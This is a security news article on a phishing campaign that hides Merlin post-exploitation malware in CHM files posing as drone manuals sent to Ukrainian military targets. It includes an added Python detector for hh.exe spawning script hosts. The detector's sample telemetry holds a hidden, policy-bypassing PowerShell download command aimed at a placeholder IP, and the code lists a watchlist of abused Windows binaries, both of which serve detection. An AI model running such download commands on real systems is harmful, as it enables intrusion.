Drone Manuals Used to Target Ukrainian Military in Phishing Attack



Ukrainian military institutions have come under attack in a phishing campaign that exploits their reliance on drones. The campaign, tracked as STARK#VORTEX, hides malware inside files posing as UAV service manuals, a resource integral to Ukrainian military operations. The entry point is a Microsoft Compiled HTML Help (CHM) file which, when opened, starts a chain of actions that ends with the deployment of the Merlin Agent, the implant of Merlin, an open-source, Go-based post-exploitation command-and-control framework. Once the agent is running, the operators can execute commands on the compromised host and use it as a foothold for further intrusion.
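The article does not spell out the intermediate steps between the CHM file and the Merlin Agent, but the first observable on an endpoint is generic to CHM abuse: Windows opens .chm files with the HTML Help viewer hh.exe, and a malicious help file has to make that process launch something else. The detection below is an added illustration, not code from the article, Securonix or CERT-UA. It assumes Sysmon-style process-creation events (EventID 1 with Image, ParentImage and CommandLine fields); the sample events are constructed for the example, and the child-process watchlist is a general one rather than indicators from this campaign.

```python
"""Flag the HTML Help viewer (hh.exe) opening help files from untrusted
locations and, more importantly, spawning script or LOLBin hosts.

Added example, not code from the article or the reports it summarizes.
Assumptions: Sysmon-style process-creation events (EventID 1) carrying
Image, ParentImage and CommandLine, and the generic fact that Windows
opens .chm files with hh.exe. The watchlists are general, not campaign IOCs.
"""
import json
from dataclasses import dataclass
from typing import Iterable, List

# Script and LOLBin hosts a help file has no legitimate reason to launch.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Directories where a phished attachment typically lands (INetCache holds
# Outlook's attachment cache). Low-severity signal on its own.
RISKY_DIRS = ("\\downloads\\", "\\temp\\", "\\inetcache\\")

# Constructed sample telemetry (JSON lines); not real logs from the campaign.
SAMPLE_EVENTS = r"""
{"EventID": 1, "ProcessId": 4120, "Image": "C:\\Windows\\hh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Users\\op\\Downloads\\UAV_service_manual.chm"}
{"EventID": 1, "ProcessId": 4388, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iwr http://203.0.113.10/x\""}
{"EventID": 1, "ProcessId": 4402, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "chrome.exe https://example.com/docs"}
{"EventID": 1, "ProcessId": 4510, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
{"EventID": 3, "ProcessId": 4388, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.10"}
"""


@dataclass(frozen=True)
class Alert:
    severity: str        # "low" (suspicious CHM open) or "high" (hh.exe spawned a host)
    process_id: int
    parent: str
    child: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of either separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> List[dict]:
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_chm_abuse(events: Iterable[dict]) -> List[Alert]:
    """Return alerts for hh.exe activity consistent with a malicious CHM."""
    alerts: List[Alert] = []
    for ev in events:
        if ev.get("EventID") != 1:          # only process-creation events
            continue
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        cmdline = ev.get("CommandLine", "")
        pid = int(ev.get("ProcessId", 0))

        # Rule 1: the help viewer itself opening a .chm from a drop location.
        if child == "hh.exe":
            low = cmdline.lower()
            if ".chm" in low and any(d in low for d in RISKY_DIRS):
                alerts.append(Alert("low", pid, parent, child, cmdline))

        # Rule 2: the help viewer spawning a script host or LOLBin. A CHM
        # that opens a browser (chrome.exe) is not flagged by this rule.
        elif parent == "hh.exe" and child in SUSPICIOUS_CHILDREN:
            alerts.append(Alert("high", pid, parent, child, cmdline))
    return alerts


def run_sample() -> List[Alert]:
    """Run the detector over the constructed sample events."""
    return detect_chm_abuse(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a.severity}] pid={a.process_id} {a.parent} -> {a.child}: {a.command_line}")
```

On the constructed sample the detector raises a low-severity alert for hh.exe opening a .chm from the Downloads folder and a high-severity alert for the PowerShell process whose parent is hh.exe; the browser child and the PowerShell launched from Explorer stay quiet. In a real deployment the high-severity rule is the one to page on, since hh.exe has essentially no legitimate reason to start a script interpreter; the low-severity rule is a hunting signal and a candidate for a blocking policy (for example, not allowing hh.exe to run files from mail-attachment or download directories at all).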


Intricate Evasion Techniques: While the initial attack vector is simple, the operators layered complex Tactics, Techniques, and Procedures (TTPs) and obfuscation on top of it to evade detection. A notable aspect of the campaign is the deliberate choice of lure documents that look like legitimate help files, which makes it harder for the intended victims to recognize the threat.


First Appearance of Merlin: This is the first time the Merlin toolkit has been seen in attacks targeting Ukrainian government organizations. Ukraine's Computer Emergency Response Team (CERT-UA) had previously identified it in an unrelated attack earlier in the year. Its deployment in this campaign shows an increase in the sophistication of the threats facing Ukrainian military entities.


Attribution to UAC-0154: CERT-UA attributes the intrusions to a threat actor it tracks under the codename UAC-0154. The files and documents used in the attack chain are effective at evading conventional security controls, which contributed to the campaign's success.


Continued Threat Landscape: The incident follows CERT-UA's recent announcement of an attempted cyber attack on a critical energy infrastructure facility in Ukraine. That attack was attributed to the Russian state-sponsored group APT28, underscoring a persistent threat landscape in the region.


The use of drone manuals as bait in this phishing campaign underscores how threat actors tailor their lures to a target's operational needs. Ukrainian military institutions, like organizations elsewhere, must remain vigilant and strengthen their defenses against increasingly sophisticated phishing and post-exploitation tooling.
